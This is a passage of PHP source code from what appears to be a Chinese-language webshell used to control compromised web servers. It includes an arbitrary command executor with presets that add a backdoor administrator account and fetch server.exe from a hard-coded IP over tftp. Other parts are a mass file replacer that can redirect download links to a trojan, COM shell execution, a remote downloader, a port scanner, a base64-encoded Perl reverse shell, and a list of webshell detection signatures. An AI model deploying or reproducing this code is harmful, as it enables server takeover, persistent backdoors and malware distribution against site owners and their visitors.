	if((!empty($_POST[\'qp\'])) && (!empty($_POST[\'qt\'])) && (!empty($_POST[\'qc\'])))
	{
		echo \'<div class="actall">\';
		$qt = str_replace(\'.\',\'\\.\',$_POST[\'qt\']);
		$qd = isset($_POST[\'qd\']) ? true : false;
		$qb = ($_POST[\'qb\'] == \'a\') ? true : false;
		echo Qingma_Auto($_POST[\'qp\'],$qt,$_POST[\'qc\'],$qd,$qb) ? \'<a href="#" onclick="history.back();">清马完毕</a>\' : \'<a href="#" onclick="history.back();">异常终止</a>\';
		echo \'</div>\';
		return false;
	}
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
print<<<END
<script language="javascript">
function Fullll(i){
	if(i==0) return false;
  Str = new Array(5);
  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";xform.qp.value = Str[i];}
	else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";xform.qt.value = Str[i];}
  return true;
}
function autoup(){
	if(document.getElementById(\'qp\').value == \'\'){alert(\'清马路径不能为空\');return false;}
	if(document.getElementById(\'qt\').value == \'\'){alert(\'文件类型不能为空\');return false;}
	if(document.getElementById(\'qc\').value == \'\'){alert(\'清除代码不能为空\');return false;}
	document.getElementById(\'xform\').submit();
}
</script>
<form method="POST" name="xform" id="xform" action="?s=c">
<div class="actall" style="height:35px;">清马路径 <input type="text" name="qp" id="qp" value="{$ROOT_DIR}" style="width:500px;">
<select onchange=\'return Fullll(options[selectedIndex].value)\'>
<option value="0" selected>--范围选择--</option>
<option value="1">网站跟目录</option>
<option value="2">本程序目录</option>
</select></div>
<div class="actall" style="height:35px;">文件类型 <input type="text" name="qt" id="qt" value=".htm|.html|.shtml" style="width:500px;">
<select onchange=\'return Fullll(options[selectedIndex].value)\'>
<option value="0" selected>--类型选择--</option>
<option value="3">静态文件</option>
<option value="4">脚本+静态</option>
<option value="5">JS文件</option>
</select></div>
<div class="actall">清除代码 <textarea name="qc" id="qc" style="width:610px;height:180px;"><script language=javascript src="http://www.baidu.com/ad.js"></script></textarea></div>
<div class="actall" style="height:30px;"><input type="checkbox" name="qd" value="1" checked>保持文件修改时间不变</div>
<div class="actall" style="height:50px;"><input type="radio" name="qb" value="a" checked>将清马应用于该文件夹,子文件夹和文件
<br><input type="radio" name="qb" value="b">仅将清马应用于该文件夹</div>
<div class="actall"><input type="button" value="开始清马" style="width:80px;height:26px;" onclick="autoup();"></div>
</form>
END;
	return true;
}

//批量替换

function Tihuan_Auto($tp,$tt,$th,$tca,$tcb,$td,$tb)
{
	if(($h_d = @opendir($tp)) == NULL) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' || $Filename == \'..\') continue;
		$Filepath = File_Str($tp.\'/\'.$Filename);
		if(is_dir($Filepath) && $tb) Tihuan_Auto($Filepath,$tt,$th,$tca,$tcb,$td,$tb);
		$doing = false;
		if(eregi($tt,$Filename))
		{
			$ic = File_Read($Filepath);
			if($th)
			{
				if(!stristr($ic,$tca)) continue;
				$ic = str_replace($tca,$tcb,$ic);
				$doing = true;
			}
			else
			{
				preg_match_all("/href\=\"([^~]*?)\"/i",$ic,$nc);
				for($i = 0;$i < count($nc[1]);$i++){if(eregi($tca,$nc[1][$i])){$ic = str_replace($nc[1][$i],$tcb,$ic);$doing = true;}}
			}
			if($td) $ftime = @filemtime($Filepath);
			if($doing) echo File_Write($Filepath,$ic,\'wb\') ? \'<font color="#006600">成功:</font>\'.$Filepath.\' <br>\'."\r\n" : \'<font color="#FF0000">失败:</font>\'.$Filepath.\' <br>\'."\r\n";
			if($td) @touch($Filepath,$ftime);
			ob_flush();
			flush();
		}
	}
	@closedir($h_d);
	return true;
}

function Tihuan_d()
{
	if((!empty($_POST[\'tp\'])) && (!empty($_POST[\'tt\'])))
	{
		echo \'<div class="actall">\';
		$tt = str_replace(\'.\',\'\\.\',$_POST[\'tt\']);
		$td = isset($_POST[\'td\']) ? true : false;
		$tb = ($_POST[\'tb\'] == \'a\') ? true : false;
		$th = ($_POST[\'th\'] == \'a\') ? true : false;
		if($th) $_POST[\'tca\'] = str_replace(\'.\',\'\\.\',$_POST[\'tca\']);
		echo Tihuan_Auto($_POST[\'tp\'],$tt,$th,$_POST[\'tca\'],$_POST[\'tcb\'],$td,$tb) ? \'<a href="#" onclick="window.location=\\'?s=d\\'">替换完毕</a>\' : \'<a href="#" onclick="window.location=\\'?s=d\\'">异常终止</a>\';
		echo \'</div>\';
		return false;
	}
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
print<<<END
<script language="javascript">
function Fulllll(i){
	if(i==0) return false;
  Str = new Array(5);
  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";tform.tp.value = Str[i];}
	else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";tform.tt.value = Str[i];}
  return true;
}
function showth(th){
	if(th == \'a\') document.getElementById(\'setauto\').innerHTML = \'查找内容 <textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>替换成为 <textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea>\';
	if(th == \'b\') document.getElementById(\'setauto\').innerHTML = \'<br>下载后缀 <input type="text" name="tca" id="tca" value=".exe|.z0|.rar|.zip|.gz|.torrent" style="width:500px;"><br><br>替换成为 <input type="text" name="tcb" id="tcb" value="http://www.baidu.com/download/muma.exe" style="width:500px;">\';
	return true;
}
function autoup(){
	if(document.getElementById(\'tp\').value == \'\'){alert(\'替换路径不能为空\');return false;}
	if(document.getElementById(\'tt\').value == \'\'){alert(\'文件类型不能为空\');return false;}
	if(document.getElementById(\'tca\').value == \'\'){alert(\'替换代码不能为空\');return false;}
	document.getElementById(\'tform\').submit();
}
</script>
<form method="POST" name="tform" id="tform" action="?s=d">
<div class="actall" style="height:35px;">替换路径 <input type="text" name="tp" id="tp" value="{$ROOT_DIR}" style="width:500px;">
<select onchange=\'return Fulllll(options[selectedIndex].value)\'>
<option value="0" selected>--范围选择--</option>
<option value="1">网站跟目录</option>
<option value="2">本程序目录</option>
</select></div>
<div class="actall" style="height:35px;">文件类型 <input type="text" name="tt" id="tt" value=".htm|.html|.shtml" style="width:500px;">
<select onchange=\'return Fulllll(options[selectedIndex].value)\'>
<option value="0" selected>--类型选择--</option>
<option value="3">静态文件</option>
<option value="4">脚本+静态</option>
<option value="5">JS文件</option>
</select></div>
<div class="actall" style="height:235px;"><input type="radio" name="th" value="a" onclick="showth(\'a\')" checked>替换文件中的指定内容 <input type="radio" name="th" value="b" onclick="showth(\'b\')">替换文件中的下载地址<br>
<div id="setauto">查找内容 <textarea name="tca" id="tca" style="width:610px;height:100px;"></textarea><br>替换成为 <textarea name="tcb" id="tcb" style="width:610px;height:100px;"></textarea></div></div>
<div class="actall" style="height:30px;"><input type="checkbox" name="td" value="1" checked>保持文件修改时间不变</div>
<div class="actall" style="height:50px;"><input type="radio" name="tb" value="a" checked>将替换应用于该文件夹,子文件夹和文件
<br><input type="radio" name="tb" value="b">仅将替换应用于该文件夹</div>
<div class="actall"><input type="button" value="开始替换" style="width:80px;height:26px;" onclick="autoup();"></div>
</form>
END;
	return true;
}

//扫描木马

function Antivirus_Auto($sp,$features,$st,$sb)
{
	if(($h_d = @opendir($sp)) == NULL) return false;
	$ROOT_DIR = File_Mode();
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' || $Filename == \'..\') continue;
		$Filepath = File_Str($sp.\'/\'.$Filename);
		if(is_dir($Filepath) && $sb) Antivirus_Auto($Filepath,$features,$st);
		if(eregi($st,$Filename))
		{
			if($Filepath == File_Str(__FILE__)) continue;
			$ic = File_Read($Filepath);
			foreach($features as $var => $key)
			{
				if(stristr($ic,$key))
				{
					$Fileurls = str_replace($ROOT_DIR,\'http://\'.$_SERVER[\'SERVER_NAME\'].\'/\',$Filepath);
					$Filetime = @date(\'Y-m-d H:i:s\',@filemtime($Filepath));
					echo \' <a href="\'.$Fileurls.\'" target="_blank"> <font color="#8B0000"> \'.$Filepath.\' </font> </a> <br> 【<a href="?s=e&fp=\'.urlencode($sp).\'&fn=\'.$Filename.\'&dim=\'.urlencode($key).\'" target="_blank"> 编辑 </a> <a href="?s=e&df=\'.urlencode($Filepath).\'" target="_blank"> 删除 </a> 】 \';
					echo \' 【 \'.$Filetime.\' 】 <font color="#FF0000"> \'.$var.\' </font> <br> <br> \'."\r\n";
					break;
				}
			}
			ob_flush();
			flush();
		}
	}
	@closedir($h_d);
	return true;
}

function Antivirus_e()
{
	if(!empty($_GET[\'df\'])){echo $_GET[\'df\'];if(@unlink($_GET[\'df\'])){echo \'删除成功\';}else{@chmod($_GET[\'df\'],0666);echo @unlink($_GET[\'df\']) ? \'删除成功\' : \'删除失败\';} return false;}
	if((!empty($_GET[\'fp\'])) && (!empty($_GET[\'fn\'])) && (!empty($_GET[\'dim\']))) { File_Edit($_GET[\'fp\'],$_GET[\'fn\'],$_GET[\'dim\']); return false; }
	$SCAN_DIR = isset($_POST[\'sp\']) ? $_POST[\'sp\'] : File_Mode();
	$features_php = array(\'php大马特征1\'=>\'cha88.cn\',\'php大马特征2\'=>\'->read()\',\'php大马特征3\'=>\'readdir(\',\'危险MYSQL语句4\'=>\'returns string soname\',\'php加密大马特征5\'=>\'eval(gzinflate(\',\'php加密大马特征6\'=>\'eval(base64_decode(\',\'php一句话特征7\'=>\'eval($_\',\'php一句话特征8\'=>\'eval ($_\',\'php上传后门特征9\'=>\'copy($_FILES\',\'php上传后门特征10\'=>\'copy ($_FILES\',\'php上传后门特征11\'=>\'move_uploaded_file($_FILES\',\'php上传后门特征12\'=>\'move_uploaded_file ($_FILES\',\'php小马特征13\'=>\'str_replace(\\'\\\\\\',\\'/\\',\');
	$features_asx = array(\'asp小马特征1\'=>\'绝对路径\',\'asp小马特征2\'=>\'输入马的内容\',\'asp小马特征3\'=>\'fso.createtextfile(path,true)\',\'asp一句话特征4\'=>\'<%execute(request\',\'asp一句话特征5\'=>\'<%eval request\',\'asp一句话特征6\'=>\'execute session(\',\'asp数据库后门特征7\'=>\'--Created!\',\'asp大马特征8\'=>\'WScript.Shell\',\'asp大小马特征9\'=>\'<%@ LANGUAGE = VBScript.Encode %>\',\'aspx大马特征10\'=>\'www.rootkit.net.cn\',\'aspx大马特征11\'=>\'Process.GetProcesses\',\'aspx大马特征12\'=>\'lake2\');
print<<<END
<form method="POST" name="tform" id="tform" action="?s=e">
<div class="actall">扫描路径 <input type="text" name="sp" id="sp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall">木马类型 <input type="checkbox" name="stphp" value="php" checked>php木马 
<input type="checkbox" name="stasx" value="asx">asp+aspx木马</div>
<div class="actall" style="height:50px;"><input type="radio" name="sb" value="a" checked>将扫马应用于该文件夹,子文件夹和文件
<br><input type="radio" name="sb" value="b">仅将扫马应用于该文件夹</div>
<div class="actall"><input type="submit" value="开始扫描" style="width:80px;"></div>
</form>
END;
	if(!empty($_POST[\'sp\']))
	{
		echo \'<div class="actall">\';
		if(isset($_POST[\'stphp\'])){$features_all = $features_php; $st = \'\.php|\.inc|\;\';}
		if(isset($_POST[\'stasx\'])){$features_all = $features_asx; $st = \'\.asp|\.asa|\.cer|\.aspx|\.ascx|\;\';}
		if(isset($_POST[\'stphp\']) && isset($_POST[\'stasx\'])){$features_all = array_merge($features_php,$features_asx); $st = \'\.php|\.inc|\.asp|\.asa|\.cer|\.aspx|\.ascx|\;\';}
		$sb = ($_POST[\'sb\'] == \'a\') ? true : false;
		echo Antivirus_Auto($_POST[\'sp\'],$features_all,$st,$sb) ? \'扫描完毕\' : \'异常终止\';
		echo \'</div>\';
	}
	return true;
}

//搜索文件

function Findfile_Auto($sfp,$sfc,$sft,$sff,$sfb)
{
	//echo $sfp.\'<br>\'.$sfc.\'<br>\'.$sft.\'<br>\'.$sff.\'<br>\'.$sfb;
	if(($h_d = @opendir($sfp)) == NULL) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' || $Filename == \'..\') continue;
		if(eregi($sft,$Filename)) continue;
		$Filepath = File_Str($sfp.\'/\'.$Filename);
		if(is_dir($Filepath) && $sfb) Findfile_Auto($Filepath,$sfc,$sft,$sff,$sfb);
		if($sff)
		{
			if(stristr($Filename,$sfc))
			{
				echo \'<a target="_blank" href="?s=p&fp=\'.urlencode($sfp).\'&fn=\'.urlencode($Filename).\'"> \'.$Filepath.\' </a><br>\'."\r\n";
				ob_flush();
				flush();
			}
		}
		else
		{
			$File_code = File_Read($Filepath);
			if(stristr($File_code,$sfc))
			{
				echo \'<a target="_blank" href="?s=p&fp=\'.urlencode($sfp).\'&fn=\'.urlencode($Filename).\'"> \'.$Filepath.\' </a><br>\'."\r\n";
				ob_flush();
				flush();
			}
		}
	}
	@closedir($h_d);
	return true;
}

function Findfile_j()
{
	if(!empty($_GET[\'df\'])){echo $_GET[\'df\'];if(@unlink($_GET[\'df\'])){echo \'删除成功\';}else{@chmod($_GET[\'df\'],0666);echo @unlink($_GET[\'df\']) ? \'删除成功\' : \'删除失败\';} return false;}
	if((!empty($_GET[\'fp\'])) && (!empty($_GET[\'fn\'])) && (!empty($_GET[\'dim\']))) { File_Edit($_GET[\'fp\'],$_GET[\'fn\'],$_GET[\'dim\']); return false; }
	$SCAN_DIR = isset($_POST[\'sfp\']) ? $_POST[\'sfp\'] : File_Mode();
	$SCAN_CODE = isset($_POST[\'sfc\']) ? $_POST[\'sfc\'] : \'config\';
	$SCAN_TYPE = isset($_POST[\'sft\']) ? $_POST[\'sft\'] : \'.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip\';
print<<<END
<form method="POST" name="jform" id="jform" action="?s=j">
<div class="actall">扫描路径 <input type="text" name="sfp" value="{$SCAN_DIR}" style="width:600px;"></div>
<div class="actall">过滤文件 <input type="text" name="sft" value="{$SCAN_TYPE}" style="width:600px;"></div>
<div class="actall">关键字串 <input type="text" name="sfc" value="{$SCAN_CODE}" style="width:395px;">
<input type="radio" name="sff" value="a" checked>搜索文件名 
<input type="radio" name="sff" value="b">搜索包含文字</div>
<div class="actall" style="height:50px;"><input type="radio" name="sfb" value="a" checked>将搜索应用于该文件夹,子文件夹和文件
<br><input type="radio" name="sfb" value="b">仅将搜索应用于该文件夹</div>
<div class="actall"><input type="submit" value="开始扫描" style="width:80px;"></div>
</form>
END;
	if((!empty($_POST[\'sfp\'])) && (!empty($_POST[\'sfc\'])))
	{
		echo \'<div class="actall">\';
		$_POST[\'sft\'] = str_replace(\'.\',\'\\.\',$_POST[\'sft\']);
		$sff = ($_POST[\'sff\'] == \'a\') ? true : false;
		$sfb = ($_POST[\'sfb\'] == \'a\') ? true : false;
		echo Findfile_Auto($_POST[\'sfp\'],$_POST[\'sfc\'],$_POST[\'sft\'],$sff,$sfb) ? \'搜索完毕\' : \'异常终止\';
		echo \'</div>\';
	}
	return true;
}

//系统信息

function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
function Info_f()
{
	$dis_func = get_cfg_var("disable_functions");
	$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
	$adminmail = (isset($_SERVER[\'SERVER_ADMIN\'])) ? "<a href=\"mailto:".$_SERVER[\'SERVER_ADMIN\']."\">".$_SERVER[\'SERVER_ADMIN\']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
	if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}
	$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
	$info = array(
		array("服务器时间",date("Y年m月d日 h:i:s",time())),
		array("服务器域名","<a href=\"http://".$_SERVER[\'SERVER_NAME\']."\" target=\"_blank\">".$_SERVER[\'SERVER_NAME\']."</a>"),
		array("服务器IP地址",gethostbyname($_SERVER[\'SERVER_NAME\'])),
		array("服务器操作系统",PHP_OS),
		array("服务器操作系统文字编码",$_SERVER[\'HTTP_ACCEPT_LANGUAGE\']),
		array("服务器解译引擎",$_SERVER[\'SERVER_SOFTWARE\']),
		array("你的IP",getenv(\'REMOTE_ADDR\')),
		array("Web服务端口",$_SERVER[\'SERVER_PORT\']),
		array("PHP运行方式",strtoupper(php_sapi_name())),
		array("PHP版本",PHP_VERSION),
		array("运行于安全模式",Info_Cfg("safemode")),
		array("服务器管理员",$adminmail),
		array("本文件路径",__FILE__),
		array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")),
		array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")),
		array("显示错误信息 display_errors",Info_Cfg("display_errors")),
		array("自动定义全局变量 register_globals",Info_Cfg("register_globals")),
		array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
		array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")),
		array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")),
		array("允许最大上传文件 upload_max_filesize",$upsize),
		array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"),
		array("被禁用的函数 disable_functions",$dis_func),
		array("phpinfo()",$phpinfo),
		array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).\'Mb\'),
		array("图形处理 GD Library",Info_Fun("imageline")),
		array("IMAP电子邮件系统",Info_Fun("imap_close")),
		array("MySQL数据库",Info_Fun("mysql_close")),
		array("SyBase数据库",Info_Fun("sybase_close")),
		array("Oracle数据库",Info_Fun("ora_close")),
		array("Oracle 8 数据库",Info_Fun("OCILogOff")),
		array("PREL相容语法 PCRE",Info_Fun("preg_match")),
		array("PDF文档支持",Info_Fun("pdf_close")),
		array("Postgre SQL数据库",Info_Fun("pg_close")),
		array("SNMP网络管理协议",Info_Fun("snmpget")),
		array("压缩文件支持(Zlib)",Info_Fun("gzclose")),
		array("XML解析",Info_Fun("xml_set_object")),
		array("FTP",Info_Fun("ftp_login")),
		array("ODBC数据库连接",Info_Fun("odbc_close")),
		array("Session支持",Info_Fun("session_start")),
		array("Socket支持",Info_Fun("fsockopen")),
	);
	echo \'<table width="100%" border="0">\';
	for($i = 0;$i < count($info);$i++){echo \'<tr><td width="40%">\'.$info[$i][0].\'</td><td>\'.$info[$i][1].\'</td></tr>\'."\n";}
	echo \'</table>\';
	return true;
}

//执行命令

function Exec_Run($cmd)
{
	$res = \'\';
	if(function_exists(\'exec\')){@exec($cmd,$res);$res = join("\n",$res);}
	elseif(function_exists(\'shell_exec\')){$res = @shell_exec($cmd);}
	elseif(function_exists(\'system\')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
	elseif(function_exists(\'passthru\')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
	elseif(@is_resource($f = @popen($cmd,"r"))){$res = \'\';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
	return $res;
}



function Exec_g()
{
	$res = \'回显窗口\';
	$cmd = \'dir\';
	if(!empty($_POST[\'cmd\'])){$res = Exec_Run($_POST[\'cmd\']);$cmd = $_POST[\'cmd\'];}
print<<<END
<script language="javascript">
function sFull(i){
	Str = new Array(11);
	Str[0] = "dir";
	Str[1] = "net user spider spider /add";
	Str[2] = "net localgroup administrators spider /add";
	Str[3] = "netstat -an";
	Str[4] = "ipconfig";
	Str[5] = "copy c:\\1.php d:\\2.php";
	Str[6] = "tftp -i 219.134.46.245 get server.exe c:\\server.exe";
	document.getElementById(\'cmd\').value = Str[i];
	return true;
}
</script>
<form method="POST" name="gform" id="gform" action="?s=g"><center><div class="actall">
命令参数 <input type="text" name="cmd" id="cmd" value="{$cmd}" style="width:399px;">
<select onchange=\'return sFull(options[selectedIndex].value)\'>
<option value="0" selected>--命令集合--</option>
<option value="1">添加管理员</option>
<option value="2">设为管理组</option>
<option value="3">查看端口</option>
<option value="4">查看地址</option>
<option value="5">复制文件</option>
<option value="6">FTP下载</option>
</select>
<input type="submit" value="执行" style="width:80px;"></div>
<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center>
</form>
END;
	return true;
}

//组件接口

function Com_h()
{
	$object = isset($_GET[\'o\']) ? $_GET[\'o\'] : \'adodb\';
print<<<END
<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> 
<a href="?s=h&o=wscript">[WScript.shell]</a> 
<a href="?s=h&o=application">[Shell.Application]</a> 
<a href="?s=h&o=downloader">[Downloader]</a></div>
<form method="POST" name="hform" id="hform" action="?s=h&o={$object}">
END;
if($object == \'downloader\')
{
	$Com_durl = isset($_POST[\'durl\']) ? $_POST[\'durl\'] : \'http://www.baidu.com/down/muma.exe\';
	$Com_dpath= isset($_POST[\'dpath\']) ? $_POST[\'dpath\'] : File_Str(dirname(__FILE__).\'/muma.exe\');
print<<<END
<div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
<div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
<div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form>
END;
	if((!empty($_POST[\'durl\'])) && (!empty($_POST[\'dpath\'])))
	{
		echo \'<div class="actall">\';
		$contents = @file_get_contents($_POST[\'durl\']);
		if(!$contents) echo \'无法读取要下载的数据\';
		else echo File_Write($_POST[\'dpath\'],$contents,\'wb\') ? \'下载文件成功\' : \'下载文件失败\';
		echo \'</div>\';
	}
}
elseif($object == \'wscript\')
{
	$cmd = isset($_POST[\'cmd\']) ? $_POST[\'cmd\'] : \'dir\';
print<<<END
<div class="actall">执行CMD命令 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
	if(!empty($_POST[\'cmd\']))
	{
		echo \'<div class="actall">\';
		$shell = new COM(\'wscript\');
		$exe = @$shell->exec("cmd.exe /c ".$cmd);
		$out = $exe->StdOut();
		$output = $out->ReadAll();
		echo \'<pre>\'.$output.\'</pre>\';
		@$shell->Release();
		$shell = NULL;
		echo \'</div>\';
	}
}
elseif($object == \'application\')
{
	$run = isset($_POST[\'run\']) ? $_POST[\'run\'] : \'cmd.exe\';
	$cmd = isset($_POST[\'cmd\']) ? $_POST[\'cmd\'] : \'copy c:\windows\php.ini c:\php.ini\';
print<<<END
<div class="actall">程序路径 <input type="text" name="run" value="{$run}" style="width:600px;"></div>
<div class="actall">命令参数 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
	if(!empty($_POST[\'run\']))
	{
		echo \'<div class="actall">\';
		$shell = new COM(\'application\');
		echo (@$shell->ShellExecute($run,\'/c \'.$cmd) == \'0\') ? \'执行成功\' : \'执行失败\';
		@$shell->Release();
		$shell = NULL;
		echo \'</div>\';
	}
}
elseif($object == \'adodb\')
{
	$string = isset($_POST[\'string\']) ? $_POST[\'string\'] : \'\';
	$sql = isset($_POST[\'sql\']) ? $_POST[\'sql\'] : \'\';
print<<<END
<script language="javascript">
function hFull(i){
	if(i==0 || i==5) return false;
	Str = new Array(12);  
	Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb";
	Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****";
	Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****";
	Str[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;";
	Str[6] = "SELECT * FROM [TableName] WHERE ID<100";
	Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'spider\',\'mypass\')";
	Str[8] = "DELETE FROM [TableName] WHERE ID=100";
	Str[9] = "UPDATE [TableName] SET USER=\'spider\' WHERE ID=100";
	Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
	Str[11] = "DROP TABLE [TableName]";
	Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
	Str[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
	if(i<=4){document.getElementById(\'string\').value = Str[i];}else{document.getElementById(\'sql\').value = Str[i];}
	return true;
}
</script>
<div class="actall">连接字符串 <input type="text" name="string" id="string" value="{$string}" style="width:526px;">
<select onchange="return hFull(options[selectedIndex].value)">
<option value="0" selected>--连接示例--</option>
<option value="1">Access连接</option>
<option value="2">MsSql连接</option>
<option value="3">MySql连接</option>
<option value="4">Oracle连接</option>
<option value="5">--SQL语法--</option>
<option value="6">显示数据</option>
<option value="7">添加数据</option>
<option value="8">删除数据</option>
<option value="9">修改数据</option>
<option value="10">建数据表</option>
<option value="11">删数据表</option>
<option value="12">添加字段</option>
<option value="13">删除字段</option>
</select></div>
<div class="actall">SQL命令 <input type="text" name="sql" id="sql" value="{$sql}" style="width:650px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div>
</form>
END;
	if(!empty($string))
	{
		echo \'<div class="actall">\';
		$shell = new COM(\'adodb\');
		@$shell->Open($string);
		$result = @$shell->Execute($sql);
		$count = $result->Fields->Count();
		for($i = 0;$i < $count;$i++){$Field[$i] = $result->Fields($i);}
		echo $result ? $sql.\' 执行成功<br>\' : $sql.\' 执行失败<br>\';
		if(!empty($count)){while(!$result->EOF){for($i = 0;$i < $count;$i++){echo htmlspecialchars($Field[$i]->value).\'<br>\';}@$result->MoveNext();}}
		$shell->Close();
		@$shell->Release();
		$shell = NULL;
		echo \'</div>\';
	}
}
	return true;
}

//扫描端口

function Port_i()
{
	$Port_ip = isset($_POST[\'ip\']) ? $_POST[\'ip\'] : \'127.0.0.1\';
	$Port_port = isset($_POST[\'port\']) ? $_POST[\'port\'] : \'21|23|25|80|110|135|139|445|1433|3306|3389|43958\';
print<<<END
<form method="POST" name="iform" id="iform" action="?s=i">
<div class="actall">扫描IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>
<div class="actall">端口号 <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>
<div class="actall"><input type="submit" value="扫描" style="width:80px;"></div>
</form>
END;
	if((!empty($_POST[\'ip\'])) && (!empty($_POST[\'port\'])))
	{
		echo \'<div class="actall">\';
		$ports = explode(\'|\', $_POST[\'port\']);
		for($i = 0;$i < count($ports);$i++)
		{
			$fp = @fsockopen($_POST[\'ip\'],$ports[$i],&$errno,&$errstr,2);
			echo $fp ? \'<font color="#FF0000">开放端口 ---> \'.$ports[$i].\'</font><br>\' : \'关闭端口 ---> \'.$ports[$i].\'<br>\';
			ob_flush();
			flush();
		}
		echo \'</div>\';
	}
	return true;
}

//Linux提权

function Linux_k()
{
	$yourip = isset($_POST[\'yourip\']) ? $_POST[\'yourip\'] : getenv(\'REMOTE_ADDR\');
	$yourport = isset($_POST[\'yourport\']) ? $_POST[\'yourport\'] : \'12666\';
print<<<END
<form method="POST" name="kform" id="kform" action="?s=k">
<div class="actall">你的地址 <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div>
<div class="actall">连接端口 <input type="text" name="yourport" value="12666" style="width:400px"></div>
<div class="actall">执行方式 <select name="use" >
<option value="perl">perl</option>
<option value="c">c</option>
</select></div>
<div class="actall"><input type="submit" value="开始连接" style="width:80px;"></div></form>
END;
	if((!empty($_POST[\'yourip\'])) && (!empty($_POST[\'yourport\'])))
	{
		echo \'<div class="actall">\';
		if($_POST[\'use\'] == \'perl\')
		{
			$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
			"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
			"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
			"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
			"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
			"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
			"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
			echo File_Write(\'/tmp/spider_bc\',base64_decode($back_connect_pl),\'wb\') ? \'创建/tmp/spider_bc成功<br>\' : \'创建/tmp/spider_bc失败<br>\';
			$perlpath = Exec_Run(\'which perl\');
			$perlpath = $perlpath ? chop($perlpath) : \'perl\';
